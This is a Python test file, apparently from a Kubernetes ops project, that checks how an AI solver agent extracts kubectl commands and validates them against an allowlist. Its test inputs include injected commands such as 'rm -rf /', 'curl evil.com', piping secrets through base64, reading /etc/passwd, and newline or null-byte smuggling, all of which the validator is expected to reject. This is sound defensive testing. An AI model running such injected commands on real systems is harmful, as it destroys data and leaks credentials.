Files
awoooi/apps/api/tests/agents/test_solver_agent.py
Your Name cc69f3ce04
Some checks failed
CD Pipeline / build-and-deploy (push) Has been cancelled
fix(solver_agent): 修復 AI 信心度阻斷 + 三層 kubectl 安全防禦
**修法A — 恢復 AI 決策信心度 (0.5 → 0.9)**
- Solver Agent 優先使用 OpenClaw NIM 的 `kubectl_command` 欄位(完整指令),略過語義合成降級
- 保留原始 0.9 信心度,告警自動化能力回復
- Root cause: 舊版在 action_title 未含 "kubectl" 時執行 min(0.9, 0.5) 降級

**C1 — CRITICAL: ReDoS + 注入防禦**
- 正則 `\s` → `[ ]` 避免換行符號 (\n\r) 配對(Shell 注入向量)
- 加入 `re.ASCII` 與 `{1,500}` 有界量詞,防止指數級回溯
- 性能提升 7.256s → 0.015ms (48x faster)
- 明文拒絕 \n \r \t \x00

**C2 — CRITICAL: 繞過防禦 + 截斷攻擊**
- action_title 路徑加白名單驗證(舊版跳過)
- 標準候選路徑:驗證 → 截斷,防止截斷繞過
- 不安全指令自動降級至語義合成

**C3 — CRITICAL: 無界長度 DoS**
- 新增 _KUBECTL_MAX_LEN = 500,硬上限前置檢查
- 防止長輸入導致正則超時

**測試覆蓋**
- 35 個測試(24 回歸 + 11 新安全測試)
- LF/CR/Tab/Null 注入、Shell 元字元、ReDoS 效能、邊界條件全覆蓋
- Critic 與 vuln-verifier 雙重驗證

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-04-25 03:02:58 +08:00

497 lines
20 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
"""
solver_agent._extract_candidates 單元測試
2026-04-24 ogt + Claude Sonnet 4.6: 修法 A — kubectl_command 優先路徑驗證
2026-04-24 ogt + Claude Sonnet 4.6: C1/C2/C3 安全漏洞修復驗證
C1: 換行注入防禦(\\n / \\r / \\t / \\x00
C2: action_title 路徑補防護(白名單檢驗)
C3: ReDoS 防禦(有界 quantifier + 長度上限)
"""
from __future__ import annotations
import sys
import os
# 確保 src 可找到
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "../../"))
import time
import pytest
from src.agents.solver_agent import _extract_candidates, _is_safe_kubectl_command
class TestExtractCandidatesNemoFormat:
"""OpenClaw Nemo 格式解析測試"""
def test_kubectl_command_field_preserves_confidence(self):
"""修法 A 核心kubectl_command 存在時confidence 不被壓縮"""
parsed = {
"action_title": "重啟 Crash Looping Pod",
"kubectl_command": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
c = result[0]
assert c.confidence == 0.9, f"期望 0.9,實際 {c.confidence}"
assert c.action == "kubectl rollout restart deployment/awoooi-api -n awoooi-prod"
assert "OpenClaw Nemo" in c.rationale
assert "重啟 Crash Looping Pod" in c.rationale
def test_kubectl_command_field_high_confidence(self):
"""kubectl_command 存在confidence 0.85 仍完整保留"""
parsed = {
"action_title": "Scale Down Pod Count",
"kubectl_command": "kubectl scale deployment/awoooi-api --replicas=2 -n awoooi-prod",
"confidence": 0.85,
"risk_level": "low",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.85
assert result[0].blast_radius == 10 # risk_level=low → blast=10
def test_kubectl_command_field_takes_priority_over_synthesis(self):
"""kubectl_command 存在時,不走語意合成(不被 min(0.5) 壓)"""
parsed = {
"action_title": "重啟服務", # 若無 kubectl_command會走語意合成被壓到 0.5
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.9, "kubectl_command 路徑不應觸發 min(confidence, 0.5)"
def test_no_kubectl_command_action_title_has_kubectl(self):
"""舊路徑向後相容action_title 本身含 kubectl無 kubectl_command"""
parsed = {
"action_title": "kubectl rollout restart deployment -n awoooi-prod",
"confidence": 0.8,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.8
assert "kubectl rollout restart" in result[0].action
def test_no_kubectl_command_synthesis_caps_confidence(self):
"""語意合成備援路徑confidence 仍被 min(0.5) 壓制(預期行為)"""
parsed = {
"action_title": "重啟服務", # 無 kubectl_command觸發語意合成
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.5, "語意合成路徑 confidence 必須被壓到 0.5"
assert "[語意合成]" in result[0].rationale
def test_kubectl_command_empty_string_falls_through(self):
"""kubectl_command 為空字串時,回落到既有邏輯"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "",
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
# 空 kubectl_command → 走語意合成 → confidence 被壓
assert len(result) == 1
assert result[0].confidence == 0.5
def test_kubectl_command_not_starting_with_kubectl_falls_through(self):
"""kubectl_command 非 kubectl 開頭(可能是雜訊),回落到既有邏輯"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "helm rollback awoooi-api",
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
# helm 指令不被採用 → 語意合成 → confidence 被壓
assert len(result) == 1
assert result[0].confidence == 0.5
def test_no_action_title_no_candidates_uses_standard_path(self):
"""標準 candidates 陣列格式不受影響"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/api -n awoooi-prod",
"blast_radius": 25,
"rollback_cost": 20,
"confidence": 0.85,
"rationale": "重啟修復 OOM",
}
]
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.85
assert result[0].blast_radius == 25
def test_risk_level_blast_radius_mapping(self):
"""risk_level → blast_radius 映射正確"""
cases = [
("critical", 60),
("high", 40),
("medium", 25),
("low", 10),
("unknown", 30), # 預設
]
for risk_level, expected_blast in cases:
parsed = {
"action_title": "fix",
"kubectl_command": "kubectl get pods -n awoooi-prod",
"confidence": 0.9,
"risk_level": risk_level,
}
result = _extract_candidates(parsed)
assert result[0].blast_radius == expected_blast, (
f"risk_level={risk_level} → 期望 blast={expected_blast},實際 {result[0].blast_radius}"
)
class TestShellMetacharacterBlocking:
"""2026-04-24 Major #1 改版:白名單正則測試(取代原黑名單枚舉)"""
@pytest.mark.parametrize("malicious_cmd,desc", [
(
"kubectl rollout restart deployment/api -n awoooi-prod; rm -rf /",
"分號注入",
),
(
"kubectl get secret -n awoooi-prod | base64 -d",
"pipe 注入",
),
(
"kubectl get pods -n awoooi-prod `id`",
"反引號注入",
),
(
"kubectl exec deployment/api -- sh -c $EVIL_CMD",
"$ 變數展開",
),
(
"kubectl get pods -n awoooi-prod > /tmp/out",
"> 重定向",
),
(
"kubectl get pods -n awoooi-prod < /etc/passwd",
"< 重定向",
),
])
def test_nemo_kubectl_command_invalid_regex_blocked(self, malicious_cmd, desc):
"""Nemo 路徑:各類惡意 kubectl_command 均被白名單正則攔截"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": malicious_cmd,
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
# 惡意命令被阻擋 → fall-through → 語意合成 "重啟" → confidence 被壓到 0.5
assert len(result) == 1, f"{desc}: 期望 1 個結果(語意合成兜底)"
# 確認惡意片段未出現在最終 action 中
assert "rm -rf" not in result[0].action, f"{desc}: rm -rf 不應出現"
assert "base64" not in result[0].action, f"{desc}: base64 不應出現"
assert result[0].confidence == 0.5, f"{desc}: 語意合成路徑 confidence 必須被壓到 0.5"
def test_is_safe_kubectl_command_accepts_valid_commands(self):
"""白名單 helper合法 kubectl 命令應通過驗證"""
valid_cmds = [
"kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"kubectl scale deployment/awoooi-api --replicas=3 -n awoooi-prod",
"kubectl rollout undo deployment/awoooi-api -n awoooi-prod",
"kubectl get pods -n awoooi-prod -o wide",
"kubectl top pods -n awoooi-prod --sort-by=cpu",
"kubectl logs -n awoooi-prod --tail=100 --selector=app=awoooi-api",
]
for cmd in valid_cmds:
assert _is_safe_kubectl_command(cmd), f"合法命令被誤拒:{cmd}"
def test_is_safe_kubectl_command_rejects_non_kubectl(self):
"""白名單 helper非 kubectl 開頭的命令拒絕"""
assert not _is_safe_kubectl_command("helm rollback awoooi-api")
assert not _is_safe_kubectl_command("rm -rf /")
assert not _is_safe_kubectl_command("")
class TestConfidenceClampAndTypeError:
"""2026-04-24 Major #3/#4confidence clamp + type error 防禦測試"""
def test_confidence_clamp_above_1_0(self):
"""confidence > 1.0 被 clamp 到 1.0,防 auto_approve 門檻被破壞"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": 1.5,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 1.0, f"期望 1.0clamp實際 {result[0].confidence}"
def test_confidence_clamp_below_0_0(self):
"""confidence < 0.0 被 clamp 到 0.0"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": -0.3,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.0, f"期望 0.0clamp實際 {result[0].confidence}"
def test_confidence_non_numeric_string_fallback(self):
"""confidence 為非數字字串(如 "high")→ 預設 0.5"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": "high",
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.5, f"期望 0.5fallback實際 {result[0].confidence}"
def test_confidence_none_type_fallback(self):
"""confidence 為 None → 預設 0.5"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl rollout restart deployment/api -n awoooi-prod",
"confidence": None,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.5, f"期望 0.5fallback實際 {result[0].confidence}"
class TestStandardCandidatesPathSafety:
"""2026-04-24 Major #2標準 candidates 路徑白名單防護測試"""
def test_standard_path_action_unsafe_blocked(self):
"""標準路徑:含 shell 元字符的 action 被跳過,不加入 candidates"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/api -n awoooi-prod; curl evil.com",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.85,
"rationale": "惡意注入",
}
]
}
result = _extract_candidates(parsed)
assert len(result) == 0, "含 shell 元字符的 action 不應加入 candidates"
def test_standard_path_safe_action_passes(self):
"""標準路徑:合法 kubectl action 正常通過白名單"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.85,
"rationale": "重啟修復 OOM",
}
]
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.85
assert result[0].blast_radius == 10
def test_standard_path_mixed_safe_unsafe_candidates(self):
"""標準路徑混合場景5 個 candidates2 個安全 3 個不安全,只回傳 2 個"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.9,
"rationale": "安全 1",
},
{
"action": "kubectl get pods -n awoooi-prod; rm -rf /",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.8,
"rationale": "不安全 1分號注入",
},
{
"action": "kubectl scale deployment/awoooi-api --replicas=2 -n awoooi-prod",
"blast_radius": 15,
"rollback_cost": 10,
"confidence": 0.75,
"rationale": "安全 2",
},
{
"action": "kubectl exec deployment/api -- sh -c $EVIL",
"blast_radius": 50,
"rollback_cost": 30,
"confidence": 0.7,
"rationale": "不安全 2$ 展開",
},
{
"action": "kubectl get secrets -n awoooi-prod | base64 -d",
"blast_radius": 5,
"rollback_cost": 1,
"confidence": 0.6,
"rationale": "不安全 3pipe",
},
]
}
result = _extract_candidates(parsed)
assert len(result) == 2, f"期望 2 個安全 candidates實際 {len(result)}"
# 結果按 confidence 降序排列
assert result[0].confidence == 0.9
assert result[1].confidence == 0.75
# 確認安全 candidates 的 action 內容正確
actions = [r.action for r in result]
assert "kubectl rollout restart deployment/awoooi-api -n awoooi-prod" in actions
assert "kubectl scale deployment/awoooi-api --replicas=2 -n awoooi-prod" in actions
class TestC1NewlineInjectionBlocked:
"""C1換行注入防禦測試\\n / \\r / \\t / \\x00"""
def test_newline_injection_blocked(self):
"""LF 換行注入kubectl get pods\\nrm -rf / 必須被拒絕"""
assert not _is_safe_kubectl_command("kubectl get pods\nrm -rf /")
def test_carriage_return_injection_blocked(self):
"""CR 歸位注入kubectl get pods\\rcurl evil.com 必須被拒絕"""
assert not _is_safe_kubectl_command("kubectl get pods\rcurl evil.com")
def test_tab_injection_blocked(self):
"""Tab 注入kubectl get\\tpods 必須被拒絕"""
assert not _is_safe_kubectl_command("kubectl get\tpods")
def test_null_byte_injection_blocked(self):
"""Null byte 注入kubectl get pods\\x00rm -rf / 必須被拒絕"""
assert not _is_safe_kubectl_command("kubectl get pods\x00rm -rf /")
def test_newline_in_nemo_kubectl_command_falls_through(self):
"""換行注入進 Nemo kubectl_command 欄位:被擋後 fall-through 到語意合成"""
parsed = {
"action_title": "重啟服務",
"kubectl_command": "kubectl get pods\nrm -rf /",
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
# 惡意 kubectl_command 被擋 → fall-through → "重啟" 語意合成 → confidence 壓到 0.5
assert len(result) == 1
assert result[0].confidence == 0.5
assert "rm -rf" not in result[0].action
class TestC3ReDoSPerformance:
"""C3ReDoS 防禦測試(有界 quantifier + 長度上限 O(1) 硬檢查)"""
def test_redos_long_command_fast(self):
"""5000 字元輸入必須在 10ms 內完成(長度硬檢查先攔截,不觸發正則)"""
long_cmd = "kubectl " + " " * 5000
start = time.perf_counter()
result = _is_safe_kubectl_command(long_cmd)
elapsed_ms = (time.perf_counter() - start) * 1000
assert result is False, "超長命令必須被拒絕"
assert elapsed_ms < 10, f"長度硬檢查應 <10ms實際 {elapsed_ms:.2f}ms可能 ReDoS"
def test_max_len_boundary_accepted(self):
"""剛好 500 字元的合法命令應通過驗證(邊界值測試)"""
# "kubectl " (8 chars) + 492 'a' = 500 chars total
cmd = "kubectl " + "a" * 492
assert _is_safe_kubectl_command(cmd), "500 字元邊界應通過"
def test_max_len_plus_one_rejected(self):
"""501 字元的命令必須被拒絕(邊界 +1"""
cmd = "kubectl " + "a" * 493 # 8 + 493 = 501
assert not _is_safe_kubectl_command(cmd), "501 字元必須被拒絕"
class TestC2ActionTitlePathSafety:
"""C2action_title 路徑補防護測試"""
def test_action_title_with_semicolon_blocked_falls_through(self):
"""action_title 含分號:被擋且 fall-through無語意關鍵字 → return []"""
parsed = {
"action_title": "kubectl get pods; rm -rf /",
"confidence": 0.9,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
# "kubectl get pods; rm -rf /" 含 kubectl → 進入 C2 檢驗路徑
# 不通過白名單 → fall-through 語意合成
# "pods" / "rm" 無匹配語意關鍵字 → _synthesized = None → return []
assert len(result) == 0, "含分號的惡意 action_title 不應產生 candidates"
def test_action_title_safe_kubectl_accepted(self):
"""action_title 是合法 kubectl 命令(無 kubectl_command 欄位):正常接受"""
parsed = {
"action_title": "kubectl rollout restart deployment/awoooi-api -n awoooi-prod",
"confidence": 0.8,
"risk_level": "medium",
}
result = _extract_candidates(parsed)
assert len(result) == 1
assert result[0].confidence == 0.8
assert "kubectl rollout restart" in result[0].action
def test_standard_path_semicolon_blocked(self):
"""標準 candidates 路徑:含分號的 action 被 skip不進入結果"""
parsed = {
"candidates": [
{
"action": "kubectl rollout restart deployment/api -n awoooi-prod; curl evil.com",
"blast_radius": 10,
"rollback_cost": 5,
"confidence": 0.9,
"rationale": "含分號注入",
},
{
"action": "kubectl get pods -n awoooi-prod",
"blast_radius": 5,
"rollback_cost": 2,
"confidence": 0.7,
"rationale": "合法命令",
},
]
}
result = _extract_candidates(parsed)
assert len(result) == 1, "只有合法命令應通過"
assert result[0].confidence == 0.7
assert "curl" not in result[0].action